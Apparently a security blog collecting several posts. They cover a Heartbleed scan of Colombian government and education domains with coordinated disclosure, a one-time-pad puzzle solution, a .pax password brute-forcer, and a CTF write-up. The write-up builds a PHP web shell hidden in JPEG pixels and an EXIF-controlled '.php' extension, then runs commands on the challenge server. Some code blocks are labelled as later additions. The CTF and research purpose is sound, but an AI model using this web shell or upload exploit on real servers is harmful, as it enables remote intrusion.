
Overview of OpenSSL security bug (CVE-2014-0160) on critical Colombian domain names

April 10, 2014

* Update on methodology and results: Statistical sample
* Update on methodology and results: Retest

The TLS heartbeat read overrun (CVE-2014-0160), also known as the Heartbleed Bug, is the hot topic right now in the information security field. This publication is not about the technical details of the bug but about statistics on affected critical Colombian domains, so I will give a big-picture view of the vulnerability and then the results of my research.

If you would like to know more about it, please take a look at the following resources: The Heartbleed Bug, Sean Cassidy's technical analysis, Robert Erbes' technical analysis.

Vulnerability summary

The Heartbleed Bug allows an attacker to read sensitive information from the memory of any process that depends on an affected OpenSSL implementation (OpenSSL versions 1.0.1 through 1.0.1f).

Sensitive information such as user credentials, session IDs, data sent to the server and received by the client, private keys, and anything else held in that process memory could be found by exploiting this vulnerability.

Affected users are recommended to fix the issue as soon as possible by updating to the latest version of OpenSSL (1.0.1g).

Methodology and results

Restricted Colombian domain names

Using domain name search methods I was able to get a long enough list of third-level domains (the list does not include subdomains) which NIC.CO classifies as restricted user domains, that is, the person who registers the domain has to meet certain legal requirements to obtain it (gov.co, edu.co, mil.co, and org.co).

These domains are used by Colombian government agencies or institutions, Colombian educational institutions recognized by the Ministry of National Education, agencies or institutions of the Colombian Armed Forces, and companies or nonprofit institutions resident in Colombia.

Update note about the statistical sample

Through this methodology, a sample of 2612 domain names was found, which is a 99% representative sample for a hypothetical population of 10000 (*) valid and functional domain names.
* Approximate data provided by NIC.CO

Evaluation date

Start time: 08/04/2014 - 22:48
Finish time: 08/04/2014 - 23:30

Identifying vulnerable domains

A modified version of Jared Stafford's Python script was used to identify the affected domains in a non-intrusive way (no data was stored or viewed during the test; the script only shows the status of the server).

    # domain_exists(), check_connectivity() and check_heartbleed() come from
    # the modified scanner script and are not shown here: the first returns
    # the resolved IP or False, the other two return True/False.
    for domain in domains:
        result = ''
        ip = domain_exists(domain)
        if ip:
            if check_connectivity(domain):
                try:
                    if check_heartbleed(domain):
                        result = 'VULNERABLE'
                    else:
                        result = 'NOT-VULNERABLE'
                except Exception:
                    # handshake or probe error: no usable TLS channel
                    result = 'SECURE-CHANNEL-UNSUPPORTED'
            else:
                result = 'SECURE-CHANNEL-UNSUPPORTED'
        else:
            result = 'NON-EXISTENT'
        # only the status is reported; nothing received from the server is kept
        print(domain, result)
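The decision tree of that loop, and the way the per-TLD tables below are derived from its output, as an added example that is not the scanner script or any code from the original post. The probe callables, the function names and the sample results are my own constructions; no network access is involved.

```python
from collections import Counter, defaultdict

# Status labels used by the scan loop above.
VULNERABLE, NOT_VULNERABLE = "VULNERABLE", "NOT-VULNERABLE"
UNSUPPORTED, NON_EXISTENT = "SECURE-CHANNEL-UNSUPPORTED", "NON-EXISTENT"


def classify(domain, resolve, connect, probe):
    """The scan loop's decision tree as a pure function.

    resolve(domain) -> IP or None, connect(domain) -> bool and
    probe(domain) -> bool (raising when no TLS session can be set up)
    are hypothetical stand-ins for domain_exists/check_connectivity/
    check_heartbleed, injected so the logic can be tested offline.
    """
    if not resolve(domain):
        return NON_EXISTENT
    if not connect(domain):
        return UNSUPPORTED
    try:
        return VULNERABLE if probe(domain) else NOT_VULNERABLE
    except Exception:  # no usable secure channel: counted as not applicable
        return UNSUPPORTED


def third_level(domain):
    """'www.example.gov.co' -> 'gov.co'."""
    return ".".join(domain.split(".")[-2:])


def summarize(results):
    """Per-TLD {bucket: (count, percent)}; 'not applicable' groups the
    unsupported and non-existent statuses, as in the tables above."""
    per_tld = defaultdict(Counter)
    for domain, status in results.items():
        bucket = {VULNERABLE: "vulnerable",
                  NOT_VULNERABLE: "not vulnerable"}.get(status, "not applicable")
        per_tld[third_level(domain)][bucket] += 1
    return {tld: {b: (n, round(100.0 * n / sum(c.values()), 2)) for b, n in c.items()}
            for tld, c in per_tld.items()}


def failing_probe(domain):
    """Constructed probe standing in for a failed handshake."""
    raise OSError("handshake failed")


# Constructed sample results, not real scan data.
SAMPLE = {
    "a.gov.co": VULNERABLE, "b.gov.co": NOT_VULNERABLE, "c.gov.co": NOT_VULNERABLE,
    "d.gov.co": NON_EXISTENT, "e.edu.co": UNSUPPORTED, "f.edu.co": VULNERABLE,
}
```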

Results

2612 restricted domain names were tested against the vulnerability (this is probably not the total number of valid domain names). 1592 domains are not vulnerable and 252 are (a total of 1844 domains with HTTPS support, distributed over 985 different IPs), and 768 are not applicable:



This is the detail of the results classified by third-level domain:

:arrow: gov.co, 602 not vulnerable (51.99%), 70 vulnerable (6.04%), 486 not applicable (41.97%).
:arrow: edu.co, 639 not vulnerable (68.34%), 104 vulnerable (11.12%), 192 not applicable (20.53%).
:arrow: mil.co, 17 not vulnerable (25.76%), 42 vulnerable (63.64%), 7 not applicable (10.61%).
:arrow: org.co, 334 not vulnerable (73.73%), 36 vulnerable (7.95%), 83 not applicable (18.32%).



Finally, we got the distribution of the vulnerable Colombian third-level domains:



Retest

One month later the 252 vulnerable domains were tested again; the results are:

:arrow: 228 (90.48%) domains no longer have the bug.
:arrow: 5 (1.98%) domains turned off their HTTPS support.
:arrow: 6 (2.38%) domains no longer have a DNS A record.
:arrow: 18 (7.14%) domains, on 16 IPs, are still vulnerable.

Comparison of vulnerable domains one month later:


Final overview of the OpenSSL security bug on Colombian third-level domain names:


Incident handling

:arrow: 08/04/2014 - Start of the security test.
:arrow: 09/04/2014 - colCERT was contacted to coordinate the incident handling and communicate the issue to the affected domains.
:arrow: 10/04/2014 - First contact with colCERT (a list of the 252 affected domain names was provided); they are now taking all necessary steps to solve the issue on the affected domains.
:arrow: 11/04/2014 - First contact with NIC.CO; they are working together with colCERT to solve the issue on all the affected domains.
:arrow: 08/05/2014 - Start of the security retest.
:arrow: 10/05/2014 - Final update.

Filed under: Security | Comments (1)

Campus Party Colombia 2013

October 13, 2013

This week, from 7 to 13 October, the sixth edition of Campus Party Colombia took place in the city of Medellín. The security area hosted this year's competition: 30 challenges in total, of which 23 were solved.

At the following link you can find the solution for each of the 23 solved challenges:

:arrow: Security challenge solutions, Campus Party Colombia 2013

On the main NULL Life site you can find write-ups for other events organized at national and international level.

The "final" scoreboard is the following:
Scoreboard Campus Party Colombia 2013

Both in the on-site game and in the chart the unfair play is evident; the chart with the real values is left to the organizers' consideration.

Because of this, and other incidents, the NULL Life team publicly announces that it will not take part in this kind of event again unless clear and concise rules are established before the game, and they are respected.

Filed under: Cryptography, Reverse Engineering, Computer Challenges, Security | Comments (0)

One-time pad challenge

July 13, 2013

On 7 March 2013 I published in the Sinfocol Facebook group a mini challenge related to the One-time pad cipher, which constitutes the perfect encryption scheme if it is used correctly:

The three winners were:
1. Everth Gallegos (PerverthsO)
2. Manuel Suárez (Blackubay)
3. Juan Escobar

The challenge description is still in the group:



The content of the dota2.txt file is the following:

The hints provided over the course of each day of the week were:
:arrow: Base64.
:arrow: A perfect, indestructible, unbreakable, unbeatable, uncrackable, etc. encryption scheme... in certain cases, when it is used correctly.
:arrow: The first word of the plaintext is: "How".
:arrow: The last hint is: Number E!
:arrow: Plaintext = b64.decode(dota2.txt) ^ Number E

The last real hint contained the way to solve the puzzle, which can be found in the form of source code (thanks to Juan Escobar for letting me publish his code):

# Sinfocol challenge
# https://www.facebook.com/groups/107415515957353/422375584461343/
# Juan M. Escobar T. @itsecurityco

import base64

ciphertext = base64.b64decode("ekFAEUFdTRFQU05RFV9VWEEeE3oTW1VcGFhSF3BHXVdYRR4UWEMXXVJTRl5eXhNCUVwZRklQUldRU0UZWVEWX04XU1dTQkVTQUMfFXoVV1ZbV1tBF0VWVF4KF1pARhV4Fl1aXUAURl9VQhZHUVRQQRJAVUFDQFhKW0ddEUBbQ1dGGVdaX1ZDQBNYVlZcEF1WE1JdS1JXQhBCUVoWehBAUksRHhJAR1teEkBYRxNAUVUXU1VUVlBMElZeGERfUF4KGVRcURFJVE0QRVlQThNQUkJUGF9YQVRbSRJCRVtbXVcRVRlOXEZcGFtXFkNHRU1aGhR1Q0UUW1FYTxhRSxJGXlFRQhBXV1RHUl9bXlVLFURSRlcfFEFcUUBRE0BQQxdaXVwQWFEXQFxcVBJHXlBWXRFGRVtDUxFZXllMVVISW1QIExwTcRRYXVJeEEdfUFwQQFxcShNMXVpRFkldTBdCXxZVVhdEQVxcEElYRUsTVU1WQl0dElZaUBNZW0MQQFgSX1VCGU9WQkVBVVVFVEMRVlQWXVdbVl9OVF0QUEwVRV1UEF5ZR1RRFlxRF19IEVReWkNGXVdUXRoUZl1VTBZWQFReTRZDWBBfWUNRFFtcU1cZV0RRVVtdUhRbUxRKUUxQVlAZR1lfQBoYWlxRUkVDXBhDUVZIEkBSQVMRRE1AVBVAXRRbXBlWV01QVEJWURFVSxJBX1dcFlhLGXwRVkNTWF1UE15IGF5cQksYV1dXGVxdSkZYV0xUVBVVSxBdVl9bUFBdXFpNAxhDUVZKElNWREZUWVdYTRNVWFMTUUFCVllDGUNfFlpREVteR0QTSl9RXFxUVkRFF1BdEkNXQVpcXxJHX19HGhRNXlhXSkYTU0gYRFpWEl5YSlFQEFZeEVxYWkRNVFtQVRFDXVNOEVpWV18TR1pVFl9XQ1JXFV9fGUJDTUVQAxFTVkEQQFlTVxB6FVVaGVFWXF1QVRlSUFhRRBdGX1JMFn8XUlUVXVVbQ0ddWU0cEnpBTRlRVxJYV0EYVFxeVFBFUVdGF1gWRlFNGFJDVlUUQFxWX0FHFw==");

key = "2.7182818284590452353602874713526624977572470936999595749669676277240766303535475945713821785251664274274663919320030599218174135966290435729003342952605956307381323286279434907632338298807531952510190115738341879307021540891499348841675092447614606680822648001684774118537423454424371075390777449920695517027618386062613313845830007520449338265602976067371132007093287091274437470472306969772093101416928368190255151086574637721112523897844250569536967707854499699679468644549059879316368892300987931277361782154249992295763514822082698951936680331825288693984964651058209392398294887933203625094431173012381970684161403970198376793206832823764648042953118023287825098194558153017567173613320698112509961818815930416903515988885193458072738667385894228792284998920868058257492796104841984443634632449684875602336248270419786232090021609902353043699418491463140934317381436405462531520961836908887070167683964243781405927145635490613031072085103837505101157477041718986106873969655212671546889570350354";
# http://www.greatplay.net/uselessia/articles/e2-1000.html

plaintext = ''
# Python 3: b64decode() yields bytes, so each ciphertext element is already an int;
# zip() stops at the shorter of ciphertext and key.
for c, k in zip(ciphertext, key):
    plaintext += chr(c ^ ord(k))

print(plaintext)

The plaintext is the following:

How you have felt, O men of Athens, at hearing the speeches of my accusers, I cannot tell; but I know that their persuasive words almost made me forget who I was - such was the effect of them; and yet they have hardly spoken a word of truth. But many as their falsehoods were, there was one of them which quite amazed me; - I mean when they told you to be upon your guard, and not to let yourselves be deceived by the force of my eloquence. They ought to have been ashamed of saying this, because they were sure to be detected as soon as I opened my lips and displayed my deficiency; they certainly did appear to be most shameless in saying this, unless by the force of eloquence they mean the force of truth; for then I do indeed admit that I am eloquent. But in how different a way from theirs!
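The reasoning behind the hints, as an added example that is not part of the original post or the winners' code: a known plaintext prefix leaks the matching key characters, and when the key is a public constant rather than random one-time material, that fragment is enough to identify it. The 12 ciphertext bytes are the start of the base64 string above; the candidate constants and function names are my own.

```python
import base64

# First 12 bytes of the challenge ciphertext (start of the base64 text above).
CIPHERTEXT_PREFIX = base64.b64decode("ekFAEUFdTRFQU05R")

# Candidate "famous constants" a solver might try once a fragment is known.
# Only the leading digits are needed here; the real key used 1000 digits of e.
CONSTANTS = {"e": "2.718281828459045", "pi": "3.14159265358979"}


def xor_bytes(data, key):
    """Byte-wise XOR of data (bytes) with a text key, the OTP operation."""
    return bytes(b ^ ord(k) for b, k in zip(data, key))


def recover_key_fragment(ciphertext, known_plaintext):
    """key = ciphertext XOR plaintext for the positions the known text covers.
    Harmless for a true one-time pad (random, never reused key); fatal when
    the key is a predictable sequence, because the fragment identifies it."""
    n = len(known_plaintext)
    return xor_bytes(ciphertext[:n], known_plaintext).decode()


def identify_key(fragment, candidates=CONSTANTS):
    """Return the name of the candidate constant that starts with fragment."""
    for name, digits in candidates.items():
        if digits.startswith(fragment):
            return name
    return None


def decrypt(ciphertext, key):
    """Apply the identified key stream to the rest of the ciphertext."""
    return xor_bytes(ciphertext, key).decode()
```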

Congratulations to the winners!

Filed under: Cryptography, Computer Challenges | Comments (2)

PAXCracker: Pick Ax secure image browser bruteforce tool

April 10, 2013

Finally I got some time to develop a random tool; this time it is a wordlist-based brute-force tool intended to recover the password of .pax files (Pick Ax image browser). At the moment PAXCracker is not a sophisticated brute-forcing tool; it is a simple wordlist iterator that tries to read the contents of .pax files using the ImgSource library (_ISource50.dll).

This is a screenshot of the tool guessing a password:

The magic is in this piece of code (_is5_ReadPAX takes care of the "dirty work"):

  /* rewind to the start of the .pax file before each attempt */
  _is5_Seek(paxFile, 0, 0);
  /* a non-zero result means the read succeeded, i.e. the password was right */
  result = _is5_ReadPAX(paxFile, &width, &height, 24, 0, password, 0);

  if (result != 0) {
    cracked = 1;
    break;
  }

You can find the whole source code in the PAXCracker GitHub Project.

You can also find the tool compiled for Windows XP x86; you should download the ImgSource DLL from the original source and copy the library to the same directory as PAXCracker.

Filed under: Programming, Security | Comments (1)

Imafreak - ForbiddenBITS 2013

March 17, 2013

For this challenge we were given a link to a website (http://192.73.237.131/) and a hint (Hint6[Freak]:~); there we can upload and view JPEG images:

By following the hint, we can get the source code of the view.php script (using ~ to retrieve the content of the editor's backup file: http://192.73.237.131/view.php~).

Wild vulnerability appears in these lines:

        // $camModel comes from the uploaded image's EXIF data and $dd from its
        // pixel data, so the uploader controls both the file extension and the content
        $filex="secretstoreddata/".md5(rand(0,100)).($camModel);
        $fp=fopen($filex, 'w');
        fwrite($fp, $dd);
        fclose($fp);

We can control the $camModel variable by modifying the EXIF data of the image, and the $dd variable by making a JPEG that contains a shellcode in the red channel. The objective here is to create a PHP script (camModel = .php) with custom shellcode:

<?php
// shellcode
$shell = '<?php system($_GET["c"]);die; ?>';
$width = strlen($shell);

// create image using true color
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get ascii value of shellcode
    $value = ord($shell[$x]);
    // set a pixel using the ascii
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}

// save image using 100% quality
imagejpeg($img, 'imafreak.jpg', 100);

// add Model metadata using exiv2 tool
system('exiv2.exe -M "add Exif.Image.Model .php" imafreak.jpg');

The result of the script is this image (Right click, save target as, for better understanding):

By uploading the JPEG, we can execute commands on the server:

:arrow: List files in root folder
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=ls%20-lia%20../

total 344
7999660 drwxr-xr-x 9 root root   4096 Mar 16 13:46 .
7999659 drwxr-xr-x 6 root root   4096 Feb 15 15:35 ..
8000136 -rw-r--r-- 1 root root    164 Mar 14 21:01 confirmed.txt
7999914 drwxr-xr-x 2 root root   4096 Mar 16 07:29 css
7999917 drwxr-xr-x 6 root root   4096 Mar 16 07:30 css_pirobox
8000029 drwxr-xr-x 2 root root   4096 Mar 16 07:31 images
8000137 -rw-r--r-- 1 root root   2588 Mar 16 07:51 index.php
8000057 drwxr-xr-x 2 root root   4096 Mar 16 07:31 js
8000138 -rw-r--r-- 1 root root    741 Dec 28  2010 piecemaker.css
8000139 -rw-r--r-- 1 root root     39 Mar 14 21:13 robots.txt
8000123 drwxrwxrwx 2 root root  49152 Mar 17 23:52 secretstoreddata
8000140 -rw-r--r-- 1 root root     57 Mar 16 07:24 super_nooooo_flag_dafuq_is_this.php
8000141 -rw-r--r-- 1 root root   8153 Apr  4  2011 templatemo_style.css
8000126 drwxrwxrwx 2 root root 225280 Mar 17 23:52 upload
8000142 -rw-r--r-- 1 root root   3203 Mar 16 13:45 upload.php
8000143 -rw-r--r-- 1 root root   3464 Mar 16 12:02 view.php
8000144 -rw-r--r-- 1 root root   3589 Mar 16 12:02 view.php~
8000134 drwxr-xr-x 2 root root   4096 Mar 16 07:32 wehatebatman

:arrow: Read first flag
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=cat%20../super_nooooo_flag_dafuq_is_this.php

<?php
/*
FLAG : dafuq_is_this_shit_i_guess_its_flag
*/
?>

Unfortunately, we were unable to get the second flag, but after the competition Phiber from Activalink pointed us to it: it was the first JPEG image uploaded using the imafreak service (http://192.73.237.131/upload/c4ca4238a0b923820dcc509a6f75849b.jpg):
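The view.php file write from above rendered in Python as an added example (not the challenge's PHP and not a fix from the organizers): the unsafe naming beside a hardened version in which the server chooses both the random name and the extension, and the EXIF Model only survives as sanitized metadata. UPLOAD_DIR mirrors the challenge's directory name; the function names and the JPEG header check are my own assumptions.

```python
import hashlib
import os
import re
import secrets

UPLOAD_DIR = "secretstoreddata"  # directory name taken from the challenge's view.php


def unsafe_store_name(rand_value, cam_model):
    """Python rendering of the vulnerable line md5(rand(0,100)).$camModel:
    the EXIF Model string, extension included, becomes part of the path."""
    return hashlib.md5(str(rand_value).encode()).hexdigest() + cam_model


def safe_store_name(cam_model, extension=".jpg"):
    """Hardened naming: a CSPRNG-generated name with a server-fixed extension,
    so a Model of '.php' can never yield an executable file. The sanitized
    Model is returned separately, to be kept as metadata, never in the path."""
    name = secrets.token_hex(16) + extension
    model = re.sub(r"[^A-Za-z0-9 _.-]", "", cam_model)[:64]
    return name, model


def store_upload(data, cam_model, directory=UPLOAD_DIR):
    """Write the bytes under the hardened name and return (path, model).
    The JPEG SOI check rejects non-image bytes; text hidden in pixel values
    still passes, which is why the extension must not be user-controlled."""
    if not data.startswith(b"\xff\xd8\xff"):
        raise ValueError("not a JPEG")
    name, model = safe_store_name(cam_model)
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, name)
    with open(path, "wb") as fp:
        fp.write(data)
    return path, model
```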

Filed under: Computer Challenges, Security | Comments (1)